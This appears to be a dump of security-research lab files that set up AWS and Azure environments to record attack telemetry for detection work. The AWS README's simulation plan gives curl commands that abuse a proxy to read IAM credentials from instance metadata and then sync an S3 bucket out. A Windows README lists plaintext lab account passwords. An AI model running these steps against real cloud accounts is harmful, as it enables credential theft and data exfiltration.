 16 |         * API & Management Events
 17 | * S3 Bucket (CloudTrail)
 18 | * EC2 (Log Collector)
 19 |     * Logstash
 20 |         * S3 Input Plugin
 21 |         * Kafka Output Plugin
 22 |     * Kafka Docker Container
 23 |         * Topic: cloudtrail
 24 |     * Kafkacat
 25 |         * Ready to consume logs from kafka
 26 | 
 27 | # Pre-Deployment
 28 | 
 29 | **Pre-Requisites:**
 30 | 
 31 | * [AWS CLI Installed](https://blacksmith.readthedocs.io/en/latest/aws_cli_setup.html)
 32 | * AWS User Account
 33 | 
 34 | ## Create Demo User Account
 35 | 
 36 | ```
 37 | aws iam create-access-key --user-name stevie
 38 | ```
 39 | 
 40 | ## Enable Programmatic Access
 41 | 
 42 | Save the access key and secret keys output after running the following command:
 43 | 
 44 | ```
 45 | aws iam create-access-key --user-name stevie
 46 | ```
 47 | 
 48 | ## Attach AdministratorAccess Policy 
 49 | 
 50 | ```
 51 | aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name stevie
 52 | ```
 53 | 
 54 | ## Configure Demo User AWS Profile
 55 | 
 56 | use the keys obtained after enabling programmatic access to the demo user account.
 57 | 
 58 | ```
 59 | aws configure --profile stevie
 60 | ```
 61 | 
 62 | ## Create Key Pair
 63 | 
 64 | ```
 65 | aws --region us-east-1 ec2 --profile stevie create-key-pair --key-name aws-ubuntu-key --query 'KeyMaterial' --output text > aws-ubuntu-key.pem
 66 | ```
 67 | 
 68 | # Deploy Environment
 69 | 
 70 | * Update VPC parameters
 71 | 
 72 | ```
 73 | ./deploy-cloud-breach.sh -r us-east-1 -p stevie
 74 | ```
 75 | 
 76 | # Simulation Plan
 77 | 
 78 | Steps from [Rhino Security labs - Cloud Goat project: Cloud Breach S3](https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3)
 79 | 
 80 | ```
 81 | curl -s http://<ec2-ip-address>/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'
 82 | 
 83 | curl http://<ec2-ip-address>/latest/meta-data/iam/security-credentials/<ec2-role-name> -H 'Host:169.254.169.254'
 84 | 
 85 | ​aws configure --profile erratic
 86 | 
 87 | ​aws_session_token = <session-token>
 88 | 
 89 | ​aws s3 ls --profile erratic
 90 | 
 91 | ​aws s3 sync s3://<bucket-name> ./cardholder-data --profile erratic
 92 | 
 93 | ```
 94 | 
 95 | # Data Collection
 96 | 
 97 | ## SSH to EC2 Log Collector
 98 | 
 99 | ```
100 | ssh -v -i ~/Documents/keys/aws-ubuntu-key.pem ubuntu@<EC2 Log Collector Public IP>
101 | ```
102 | ## Verify Logstash
103 | 
104 | ```
105 | tail -f /var/log/logstash/logstash-plain.log
106 | ```
107 | 
108 | ## Verify Kafka Broker
109 | 
110 | Verify if the Kafka broker is running, the `cloudtrail` topic is available and there is data already being collected from the cloudtrail S3 bucket:
111 | 
112 | ```
113 | kafkacat -b localhost:9092 -t cloudtrail -C
114 | ```
115 | 
116 | ## Collect Cloudtrail Logs (Consume)
117 | 
118 | ```
119 | kafkacat -b localhost:9092 -t cloudtrail -C -o end > ec2_proxy_s3_exfiltration_$(date +%F%H%M%S).json
120 | ```
121 | 
122 | # References
123 | 
124 | * https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-capital-one-breach-ttps-in-aws-logs-using-azure/ba-p/1014258
125 | * https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-capital-one-breach-ttps-in-aws-logs-using-azure/ba-p/1019767
126 | * https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3
127 | * https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/cloud_breach_s3/cheat_sheet.md
128 | * https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html#id_users_create_cliwpsapi
129 | * https://docs.aws.amazon.com/cli/latest/reference/iam/create-access-key.html
130 | * https://www.elastic.co/guide/en/logstash/current/plugins-codecs-cloudtrail.html
131 | * https://www.elastic.co/guide/en/logstash/current/plugins-inputs-s3.html
132 | * https://github.com/Azure/Azure-Sentinel/blob/master/Parsers/Logstash/input-aws_s3-output-loganalytics.conf
133 | 


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/cfn-parameters/ec2-log-collector-parameters.json:
--------------------------------------------------------------------------------
 1 | [
 2 |   {
 3 |     "ParameterKey": "KeyName",
 4 |     "ParameterValue": "aws-ubuntu-key"
 5 |   },
 6 |   {
 7 |     "ParameterKey": "MordorVPCStackName",
 8 |     "ParameterValue": "MordorVPCStack"
 9 |   },
10 |   {
11 |     "ParameterKey": "MordorCTStackName",
12 |     "ParameterValue": "MordorCTStack"
13 |   },
14 |   {
15 |     "ParameterKey": "InstanceType",
16 |     "ParameterValue": "t2.small"
17 |   }, 
18 |   {
19 |     "ParameterKey": "PrivateIP",
20 |     "ParameterValue": "192.168.1.7"
21 |   }
22 | ]
23 | 


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/cfn-parameters/ec2-nginx-parameters.json:
--------------------------------------------------------------------------------
 1 | [
 2 |   {
 3 |     "ParameterKey": "KeyName",
 4 |     "ParameterValue": "aws-ubuntu-key"
 5 |   },
 6 |   {
 7 |     "ParameterKey": "MordorVPCStackName",
 8 |     "ParameterValue": "MordorVPCStack"
 9 |   },
10 |   {
11 |     "ParameterKey": "MordorS3StackName",
12 |     "ParameterValue": "MordorS3Stack"
13 |   },
14 |   {
15 |     "ParameterKey": "InstanceType",
16 |     "ParameterValue": "t2.micro"
17 |   }, 
18 |   {
19 |     "ParameterKey": "PrivateIP",
20 |     "ParameterValue": "192.168.1.6"
21 |   }
22 | ]
23 | 


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/cfn-parameters/enable-cloudtrail-parameters.json:
--------------------------------------------------------------------------------
1 | [
2 |   {
3 |     "ParameterKey": "MordorS3StackName",
4 |     "ParameterValue": "MordorS3Stack"
5 |   }
6 | ]
7 | 


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/cfn-parameters/vpc-parameters.json:
--------------------------------------------------------------------------------
 1 | [
 2 |   {
 3 |     "ParameterKey": "RestrictLocation",
 4 |     "ParameterValue": "x.x.x.x/32"
 5 |   },
 6 |   {
 7 |     "ParameterKey": "VPCSubnetCidrBlock",
 8 |     "ParameterValue": "192.168.1.0/16"
 9 |   }, 
10 |   {
11 |     "ParameterKey": "PublicSubnetCidrBlock",
12 |     "ParameterValue": "192.168.1.0/24"
13 |   }
14 | ]
15 | 


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/cfn-templates/enable-cloudtrail.json:
--------------------------------------------------------------------------------
  1 | {
  2 |     "AWSTemplateFormatVersion": "2010-09-09",
  3 |     "Parameters" : {
  4 |         "MordorS3StackName": {
  5 |             "Description": "Name of the stack that created the S3 bucket where we are collecting event logs from.",
  6 |             "Type": "String",
  7 |             "MinLength" : 1,
  8 |             "MaxLength" : 255,
  9 |             "AllowedPattern" : "^[a-zA-Z][-a-zA-Z0-9]*$",
 10 |             "Default" : "MordorS3Stack"
 11 |         }
 12 |     },
 13 |     "Resources" : {
 14 |         "CloudTrail": {
 15 |             "Type": "AWS::CloudTrail::Trail",
 16 |             "Properties": {
 17 |                 "TrailName": "GlobalS3DataEventsTrail",
 18 |                 "IsLogging": true,
 19 |                 "EnableLogFileValidation": true,
 20 |                 "EventSelectors": [
 21 |                     {
 22 |                         "IncludeManagementEvents": true,
 23 |                         "ReadWriteType": "All"
 24 |                     },
 25 |                     {
 26 |                         "DataResources": [
 27 |                             {
 28 |                                 "Type": "AWS::S3::Object",
 29 |                                 "Values": [
 30 |                                     {
 31 |                                         "Fn::Join": [
 32 |                                         "", [
 33 |                                           "arn:",
 34 |                                           "aws:s3:::",
 35 |                                           { "Fn::ImportValue" : { "Fn::Sub": "${MordorS3StackName}-BucketName" } },
 36 |                                           "/"
 37 |                                         ]
 38 |                                       ]
 39 |                                     }
 40 |                                 ]
 41 |                             }
 42 |                         ],
 43 |                         "ReadWriteType": "All"
 44 |                     }
 45 |                 ],
 46 |                 "IsMultiRegionTrail": false,
 47 |                 "IncludeGlobalServiceEvents": false,
 48 |                 "S3BucketName": {
 49 |                     "Ref": "S3BucketForCloudTrail"
 50 |                 }
 51 |             },
 52 |             "DependsOn": "S3BucketPolicy"
 53 |         },
 54 |         "S3BucketForCloudTrail": {
 55 |             "Type": "AWS::S3::Bucket",
 56 |             "Properties": {}
 57 |         },
 58 |         "S3BucketPolicy": {
 59 |             "Type": "AWS::S3::BucketPolicy",
 60 |             "Properties": {
 61 |                 "Bucket": {
 62 |                     "Ref": "S3BucketForCloudTrail"
 63 |                 },
 64 |                 "PolicyDocument": {
 65 |                     "Version": "2012-10-17",
 66 |                     "Statement": [
 67 |                         {
 68 |                             "Sid": "AWSCloudTrailBucketPermissionsCheck",
 69 |                             "Effect": "Allow",
 70 |                             "Principal": {
 71 |                                 "Service": [
 72 |                                     "cloudtrail.amazonaws.com"
 73 |                                 ]
 74 |                             },
 75 |                             "Action": "s3:GetBucketAcl",
 76 |                             "Resource": {
 77 |                                 "Fn::GetAtt": [
 78 |                                     "S3BucketForCloudTrail",
 79 |                                     "Arn"
 80 |                                 ]
 81 |                             }
 82 |                         },
 83 |                         {
 84 |                             "Sid": " AWSConfigBucketDelivery",
 85 |                             "Effect": "Allow",
 86 |                             "Principal": {
 87 |                                 "Service": [
 88 |                                     "cloudtrail.amazonaws.com"
 89 |                                 ]
 90 |                             },
 91 |                             "Action": "s3:PutObject",
 92 |                             "Resource": {
 93 |                                 "Fn::Join": [
 94 |                                     "",
 95 |                                     [
 96 |                                         {
 97 |                                             "Fn::GetAtt": [
 98 |                                                 "S3BucketForCloudTrail",
 99 |                                                 "Arn"
100 |                                             ]
101 |                                         },
102 |                                         "/AWSLogs/*"
103 |                                     ]
104 |                                 ]
105 |                             },
106 |                             "Condition": {
107 |                                 "StringEquals": {
108 |                                     "s3:x-amz-acl": "bucket-owner-full-control"
109 |                                 }
110 |                             }
111 |                         }
112 |                     ]
113 |                 }
114 |             }
115 |         }
116 |     },
117 |     "Outputs" : {
118 |         "BucketName": {
119 |             "Value": {"Ref": "S3BucketForCloudTrail"},
120 |             "Description": "Name of the S3 bucket that holds audit logs (Cloudtrail).",
121 |             "Export" : { "Name" : {"Fn::Sub": "${AWS::StackName}-BucketName" }}
122 |         }
123 |     }
124 | }
125 | 


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/cfn-templates/s3.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "AWSTemplateFormatVersion": "2010-09-09",
 3 |     "Parameters" : {},
 4 |     "Resources" : {
 5 |         "S3Bucket" : {
 6 |             "Type" : "AWS::S3::Bucket",
 7 |             "DeletionPolicy": "Delete",
 8 |             "Properties" : {
 9 |                 "AccessControl": "Private"
10 |             }
11 |         }
12 |     },
13 |     "Outputs" : {
14 |         "BucketName": {
15 |             "Value": {"Ref": "S3Bucket"},
16 |             "Description": "Name of the S3 bucket where files will be exfiltrated from.",
17 |             "Export" : { "Name" : {"Fn::Sub": "${AWS::StackName}-BucketName" }}
18 |         }
19 |     }
20 | }
21 | 


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/cfn-templates/vpc.json:
--------------------------------------------------------------------------------
  1 | {
  2 |     "AWSTemplateFormatVersion": "2010-09-09",
  3 |     "Parameters" : {
  4 |         "Owner": {
  5 |             "Description": "Enter Team or Individual Name Responsible for the Stack.",
  6 |             "Type": "String",
  7 |             "Default": "Roberto Rodriguez"
  8 |         },
  9 |         "RestrictLocation" : {
 10 |             "Description" : "The IP address range that can access the EC2 instances.",
 11 |             "Type" : "String",
 12 |             "MinLength" : "9",
 13 |             "MaxLength" : "18",
 14 |             "Default" : "0.0.0.0/0",
 15 |             "AllowedPattern" : "(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})/(\\d{1,2})",
 16 |             "ConstraintDescription" : "Must be a valid IP CIDR range of the form x.x.x.x/x."
 17 |         },
 18 |         "VPCSubnetCidrBlock": {
 19 |             "Description": "Enter VPC CIDR Block. (i.e. 10.0.0.0/16 = 10.0.0.0-10.0.255.255 = 256 Subnets - 65534 hosts)",
 20 |             "Type": "String",
 21 |             "MinLength": "10",
 22 |             "MaxLength": "18",
 23 |             "AllowedPattern": "(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})/(\\d{1,2})"
 24 |         },
 25 |         "PublicSubnetCidrBlock": {
 26 |             "Description": "Enter Public subnet CIDR Block. (i.e. 10.0.0.0/16 = 10.0.0.0-10.0.255.255 = 256 Subnets - 65534 hosts)",
 27 |             "Type": "String",
 28 |             "MinLength": "10",
 29 |             "MaxLength": "18",
 30 |             "AllowedPattern": "(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})/(\\d{1,2})"
 31 |         }
 32 |     },
 33 |     "Mappings" : {
 34 |         "AWSRegion2AZ" : {
 35 |             "us-east-1" : { "1" : "us-east-1b", "2" : "us-east-1c", "3" : "us-east-1d", "4" : "us-east-1e", "5" : "us-east-1f" },
 36 |             "us-west-1" : { "1" : "us-west-1b", "2" : "us-west-1c" },
 37 |             "us-west-2" : { "1" : "us-west-2a", "2" : "us-west-2b", "3" : "us-west-2c"  }
 38 |         }
 39 |     },
 40 |     "Resources" : {
 41 |         "mainVpc" : {
 42 |             "Type" : "AWS::EC2::VPC",
 43 |             "Properties" : {
 44 |                 "EnableDnsSupport": "true",
 45 |                 "EnableDnsHostnames": "true",
 46 |                 "CidrBlock": {"Ref": "VPCSubnetCidrBlock"}
 47 |             }
 48 |         },
 49 |         "mainGateway" : {
 50 |             "Type" : "AWS::EC2::InternetGateway"
 51 |         },
 52 |         "mainRouteTable" : {
 53 |             "Type" : "AWS::EC2::RouteTable",
 54 |             "Properties" : {
 55 |                 "VpcId" : { "Ref" : "mainVpc" }
 56 |             }
 57 |         },
 58 |         "AttachGateway" : {
 59 |             "Type" : "AWS::EC2::VPCGatewayAttachment",
 60 |             "Properties" : {
 61 |                 "VpcId" : { "Ref" : "mainVpc" },
 62 |                 "InternetGatewayId" : { "Ref" : "mainGateway" }
 63 |             }
 64 |         },
 65 |         "mainRoute" : {
 66 |             "Type" : "AWS::EC2::Route",
 67 |             "DependsOn" : [ "mainGateway", "mainRouteTable" ],
 68 |             "Properties" : {
 69 |                 "RouteTableId" : { "Ref" : "mainRouteTable" },
 70 |                 "DestinationCidrBlock" : "0.0.0.0/0",
 71 |                 "GatewayId" : { "Ref" : "mainGateway" }
 72 |             }
 73 |         },
 74 |         "PublicSubnet" : {
 75 |             "Type" : "AWS::EC2::Subnet",
 76 |             "Properties" : {
 77 |                 "VpcId" : { "Ref" : "mainVpc" },
 78 |                 "CidrBlock" : { "Ref" : "PublicSubnetCidrBlock" },
 79 |                 "AvailabilityZone" : { "Fn::FindInMap" : [ "AWSRegion2AZ", { "Ref" : "AWS::Region" }, "1" ] },
 80 |                 "MapPublicIpOnLaunch" : "true"
 81 |             }
 82 |         },
 83 |         "PublicSubnetRouteTableAssociation" : {
 84 |             "Type" : "AWS::EC2::SubnetRouteTableAssociation",
 85 |             "DependsOn": [ "PublicSubnet", "mainRouteTable" ],
 86 |             "Properties" : {
 87 |                 "SubnetId" : { "Ref" : "PublicSubnet" },
 88 |                 "RouteTableId" : { "Ref" : "mainRouteTable" }
 89 |             }
 90 |         },
 91 |         "UbuntuBaseSecurityGroup" : {
 92 |             "Type" : "AWS::EC2::SecurityGroup",
 93 |             "Properties" : {
 94 |                 "GroupDescription" : "Enable access via ports 22,443 from your public IP, internal communications, and outbound connections to anywhere",
 95 |                 "VpcId" : { "Ref" : "mainVpc" },
 96 |                 "SecurityGroupIngress" : [
 97 |                     {
 98 |                         "IpProtocol" : "tcp",
 99 |                         "FromPort" : "22",
100 |                         "ToPort" : "22",
101 |                         "CidrIp" : { "Ref" : "RestrictLocation" }
102 |                     },
103 |                     {
104 |                         "IpProtocol" : "tcp",
105 |                         "FromPort" : "443",
106 |                         "ToPort" : "443",
107 |                         "CidrIp" : { "Ref" : "RestrictLocation" }
108 |                     },
109 |                     {
110 |                         "IpProtocol" : "tcp",
111 |                         "FromPort" : "80",
112 |                         "ToPort" : "80",
113 |                         "CidrIp" : { "Ref" : "RestrictLocation" }
114 |                     },
115 |                     {
116 |                         "IpProtocol" : "-1",
117 |                         "FromPort" : "0",
118 |                         "ToPort" : "0",
119 |                         "CidrIp" : { "Ref" : "PublicSubnetCidrBlock" }
120 |                     }
121 |                 ],
122 |                 "SecurityGroupEgress" : [
123 |                     {
124 |                         "IpProtocol" : "-1",
125 |                         "FromPort" : "0",
126 |                         "ToPort" : "0",
127 |                         "CidrIp" : "0.0.0.0/0"
128 |                     }
129 |                 ]
130 |             }
131 |         }
132 |     },
133 |     "Outputs" : {
134 |         "VPCId" : {
135 |             "Description" : "VPC ID",
136 |             "Value" :  { "Ref" : "mainVpc" },
137 |             "Export" : { "Name" : {"Fn::Sub": "${AWS::StackName}-VPCID" }}
138 |         },
139 |         "PublicSubnet" : {
140 |             "Description" : "The subnet ID to use for public web servers",
141 |             "Value" :  { "Ref" : "PublicSubnet" },
142 |             "Export" : { "Name" : {"Fn::Sub": "${AWS::StackName}-SubnetID" }}
143 |         },
144 |         "UbuntuBaseSecurityGroup" : {
145 |             "Description" : "The security group ID to use for Ubuntu servers",
146 |             "Value" :  { "Fn::GetAtt" : ["UbuntuBaseSecurityGroup", "GroupId"] },
147 |             "Export" : { "Name" : {"Fn::Sub": "${AWS::StackName}-Ubuntu-SecurityGroupID" }}
148 |         }
149 |     }
150 | }
151 | 


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/data/ring.txt:
--------------------------------------------------------------------------------
1 | Ash nazg durbatulûk, ash nazg gimbatul, ash nazg thrakatulûk, agh burzum-ishi krimpatul


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/deploy-cloud-breach.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | set -e
 3 | 
 4 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 5 | # License: GPL-3.0
 6 | 
 7 | usage(){
 8 |     echo " "
 9 |     echo "Usage: $0 [option...]" >&2
10 |     echo
11 |     echo "   -r             set region"
12 |     echo "   -p             set account profile"
13 |     echo "   -h             Prints this message"
14 |     echo
15 |     echo "Examples:"
16 |     echo " $0 -r 'us-east-1' -p stevie      Deploy stacks in the us-east-1 region with a specific profile"
17 |     echo " "
18 |     exit 1
19 | }
20 | 
21 | # ************ Command Options **********************
22 | MORDOR_REGION="us-east-1"
23 | USER_PROFILE="default"
24 | while getopts r:p:h option
25 | do
26 |     case "${option}"
27 |     in
28 |         r) MORDOR_REGION=$OPTARG;;
29 |         p) USER_PROFILE=$OPTARG;;
30 |         h | [?]) usage ; exit;;
31 |     esac
32 | done
33 | 
34 | echo " "
35 | echo "=========================="
36 | echo "* Deploying Cloud Breach *"
37 | echo "=========================="
38 | echo " "
39 | if ! aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation describe-stacks --stack-name MordorS3Stack > /dev/null 2>&1; then
40 |     echo "[+] Deploying vulnerable MordorS3Stack"
41 |     aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation create-stack --stack-name MordorS3Stack --template-body file://./cfn-templates/s3.json
42 |     echo "  [*] Waiting for MordorS3Stack creation"
43 |     aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation wait stack-create-complete --stack-name MordorS3Stack
44 |     echo "  [*] Copying local files to new S3 bucket"
45 |     S3Bucket=$( echo $(aws cloudformation describe-stacks --stack-name MordorS3Stack --query "Stacks[0].Outputs[0].OutputValue") | tr -d '"')
46 |     aws s3 cp data/ring.txt s3://$S3Bucket/
47 | else
48 |     echo "[+] MordorS3Stack already exists"
49 | fi
50 | echo " "
51 | if ! aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation describe-stacks --stack-name MordorCTStack > /dev/null 2>&1; then
52 |     echo "[+] Deploying MordorCTStack to enable CloudTrail logs"
53 |     aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation create-stack --stack-name MordorCTStack --template-body file://./cfn-templates/enable-cloudtrail.json
54 | else
55 |     echo "[+] MordorS3Stack already exists"
56 | fi
57 | echo " "
58 | if ! aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation describe-stacks --stack-name MordorVPCStack > /dev/null 2>&1; then
59 |     echo "[+] Deploying MordorVPCStack"
60 |     aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation create-stack --stack-name MordorVPCStack --template-body file://./cfn-templates/vpc.json --parameters file://./cfn-parameters/vpc-parameters.json
61 |     echo "  [*] Waiting for MordorVPCStack creation"
62 |     aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation wait stack-create-complete --stack-name MordorVPCStack
63 | else
64 |     echo "[+] MordorVPCStack already exists"
65 | fi
66 | echo " "
67 | if ! aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation describe-stacks --stack-name MordorNginxStack > /dev/null 2>&1; then
68 |     echo "[+] Deploying MordorNginxStack"
69 |     aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation create-stack --stack-name MordorNginxStack --template-body file://./cfn-templates/ec2-nginx.json --parameters file://./cfn-parameters/ec2-nginx-parameters.json --capabilities CAPABILITY_NAMED_IAM
70 | else
71 |     echo "[+] MordorNginxStack already exists"
72 | fi
73 | echo " "
74 | if ! aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation describe-stacks --stack-name MordorLogCollectorStack > /dev/null 2>&1; then
75 |     echo "[+] Deploying MordorLogCollectorStack"
76 |     echo "  [*] Waiting for CloudTrail stack creation"
77 |     aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation wait stack-create-complete --stack-name MordorCTStack
78 |     aws --region $MORDOR_REGION --profile $USER_PROFILE cloudformation create-stack --stack-name MordorLogCollectorStack --template-body file://./cfn-templates/ec2-log-collector.json --parameters file://./cfn-parameters/ec2-log-collector-parameters.json --capabilities CAPABILITY_NAMED_IAM
79 | else
80 |     echo "[+] MordorLogCollectorStack already exists"
81 | fi
82 | 


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/kafka/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3.5'
 2 | 
 3 | services:
 4 |   mordor-zookeeper:
 5 |     image: otrf/helk-zookeeper:2.4.0
 6 |     container_name: helk-zookeeper
 7 |     logging:
 8 |       driver: "json-file"
 9 |       options:
10 |         max-file: "5"
11 |         max-size: "1m"
12 |     restart: always
13 |     networks:
14 |       mordor:
15 |   mordor-kafka-broker:
16 |     image: otrf/helk-kafka-broker:2.4.0
17 |     container_name: mordor-kafka-broker
18 |     logging:
19 |       driver: "json-file"
20 |       options:
21 |         max-file: "5"
22 |         max-size: "1m"
23 |     restart: always
24 |     depends_on:
25 |       - mordor-zookeeper
26 |     environment:
27 |       KAFKA_BROKER_NAME: mordor-kafka-broker
28 |       KAFKA_BROKER_ID: 1
29 |       KAFKA_BROKER_PORT: 9092
30 |       REPLICATION_FACTOR: 1
31 |       ADVERTISED_LISTENER: ${ADVERTISED_LISTENER}
32 |       ZOOKEEPER_NAME: mordor-zookeeper
33 |       KAFKA_CREATE_TOPICS: cloudtrail
34 |       KAFKA_HEAP_OPTS: -Xmx1G -Xms256M
35 |       LOG_RETENTION_HOURS: 4
36 |     ports:
37 |       - "9092:9092"
38 |     networks:
39 |       mordor:
40 | 
41 | networks:
42 |   mordor:
43 |     driver: bridge


--------------------------------------------------------------------------------
/environments/aws/cloud-breach-s3/logstash/logstash-config-sample.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |    s3 {
 3 |        bucket => "<bucket-name>"
 4 |        prefix => "AWSLogs/<account-id>/CloudTrail/"
 5 |        codec => "cloudtrail"
 6 |    }
 7 | }
 8 | output {
 9 |    kafka {
10 |       bootstrap_servers => "localhost:9092"
11 |       codec => "json"
12 |       topic_id => "cloudtrail"
13 |    }
14 | }


--------------------------------------------------------------------------------
/environments/windows/shire/README.md:
--------------------------------------------------------------------------------
  1 | # Shire Environment
  2 | 
  3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FSimuLand%2Fmaster%2Fenvironments%2Fwindows%2Fshire%2Fazuredeploy.json) [![Visualize](https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/1-CONTRIBUTION-GUIDE/images/visualizebutton.png)](http://armviz.io/#/?load=https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FSimuLand%2Fmaster%2Fenvironments%2Fwindows%2Fshire%2Fazuredeploy.json)
  4 | 
  5 | ## Network Design
  6 | 
  7 | ![](../../../docs/source/_static/mordor-shire-design.png)
  8 | 
  9 | ## Domain Users Information
 10 | 
 11 | | FirstName | LastName | SamAccountName | Department | JobTitle | Password | Identity | UserContainer | 
 12 | |:--- |:--- |:--- |:--- |:--- |:--- |:--- |:--- |
 13 | | Norah | Martha | nmartha | Human Resources | HR Director | S@l@m3!123 | Users | DomainUsers | 
 14 | | Pedro | Gustavo | pgustavo | IT Support | CIO | W1n1!2019 | Domain Admins | DomainUsers |
 15 | | Lucho | Rodriguez | lrodriguez | Accounting | VP | T0d@y!2019 | Users | DomainUsers |
 16 | | Stevie | Beavers | sbeavers | Sales | Agent | B1gM@c!2020 | Users | DomainUsers |
 17 | | Pam | Beesly | pbeesly | Reception | Receptionist | Fl0nk3rt0n!T0by | Users | DomainUsers |
 18 | | Dwight | Schrute | dschrute | Sales | Assistant | Schrut3F@rms!B33ts | Users | DomainUsers |
 19 | | Michael | Scott | mscott | Management | BestBoss | abc123!D@t3M1k3 | Domain Admins | DomainUsers | 
 20 | | Sysmon | MS | sysmonsvc | IT Support | Service Account | Buggy!1122 | Users | DomainUsers |
 21 | 
 22 | ## Data Sources Collected
 23 | 
 24 | * [Windows Security Auditing](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Enable-WinAuditCategories.ps1)
 25 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmonv11.0.xml)
 26 | * [WEF Subscriptions](https://github.com/OTRF/Blacksmith/tree/master/resources/configs/wef/subscriptions)
 27 | * [SACL Audit Rules](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Set-SACLs.ps1)
 28 | 
 29 | ## Deployment
 30 | 
 31 | #### Point-To-Site VPN Certificates Setup
 32 | 
 33 | * [Create root CA certificate](https://blacksmith.readthedocs.io/en/latest/azure_p2s_vpn_setup.html#create-a-root-ca-certificate)
 34 | * Get the name of it (CN= Root CA Name)
 35 | * Get the root CA cert data by running the following commands and save it to pass it as a parameter while creating the environment.
 36 | 
 37 | ```
 38 | openssl x509 -in caCert.pem -outform der | base64 | pbcopy
 39 | ```
 40 | * [Create a client Certificate signed with the CA’s root key](https://blacksmith.readthedocs.io/en/latest/azure_p2s_vpn_setup.html#create-a-client-certificate-signed-with-the-ca-s-root-key)
 41 | 
 42 | ### Deploy Environment
 43 | 
 44 | * Clone the project and change your directory to windows one
 45 | 
 46 | ```
 47 | https://github.com/OTRF/SimuLand
 48 | cd SimuLand/tree/master/environments/windows/shire
 49 | ```
 50 | 
 51 | * [Install and set up Azure CLI](https://blacksmith.readthedocs.io/en/latest/azure_cli_setup.html)
 52 | * Create an Azure Resource group
 53 | 
 54 | ```
 55 | az group create --location eastus --resource-group MyResourceGroup
 56 | ```
 57 | 
 58 | * Use the following commands to create the environment
 59 | 
 60 | ```
 61 | az group deployment create --name <Deployment Name> --resource-group <Resource Group Name> --template-file azuredeploy.json --parameters adminUsername=<USERNAME> adminPassword='<PASSWORD>' clientRootCertName=<Root CA Certificate Name> clientRootCertData="<Root CA Cert Data>"
 62 | ```
 63 | 
 64 | ## Connect to Environment (P2S VPN)
 65 | 
 66 | VMs deployed in Azure will not be accessible via their Public IP addresses. A Point-To-Site (P2S) VPN is set up and you will need to use a client certificate signed with the CA's root private key created earlier. 
 67 | 
 68 | * [Set up OpenVPN Client](https://docs.microsoft.com/en-us/azure/vpn-gateway/vpn-gateway-howto-openvpn-clients)
 69 |     * Use the Client's Certificate (PEM format)
 70 |     * Use the Client's Private Key (PEM format)
 71 | * RDP or SSH to the Windows and Linux endpoints in the environment.
 72 | 
 73 | ## Collect Security Event Logs
 74 | 
 75 | This environment comes with a data pipeline option to collect security event logs from Windows Endpoints via Windows Event Forwarding (WEF) configurations, send them to a Logstash pipeline which sends them over to an Azure Event Hub. From there, one could use tools such as Kafkacat to connect to the Azure Event hub, consume events being sent over and write them to a local JSON file in real-time.
 76 | 
 77 | ### Install Kafkacat
 78 | 
 79 | On recent enough Debian systems:
 80 | 
 81 | ```
 82 | apt-get install kafkacat
 83 | ```
 84 | 
 85 | And on Mac OS X with homebrew installed:
 86 | 
 87 | ```
 88 | brew install kafkacat
 89 | ```
 90 | 
 91 | ### Kafkacat Conf File Setup
 92 | 
 93 | Make sure you update the [**Kafkacat.conf**](https://github.com/OTRF/SimuLand/blob/master/environments/windows/kafkacat/kafkacat.conf) with the values from your environment.
 94 | 
 95 | **Run Kafkacat and Consume Events**
 96 | 
 97 | Once you create the environment, you can run the following command to start consuming events from the Azure Event Hub and write them to a local JSON file:
 98 | 
 99 | ```
100 | kafkacat -b <eventhub-namespace>.servicebus.windows.net:9093 -t <eventhunb-name> -F kafkacat.conf -C -o end > mordor_$(date +%F%H%M%S).json
101 | ```
102 | 
103 | I would run that command right before emulating adversary techniques.
104 | 
105 | ## Collect PCAP (East-West)
106 | 
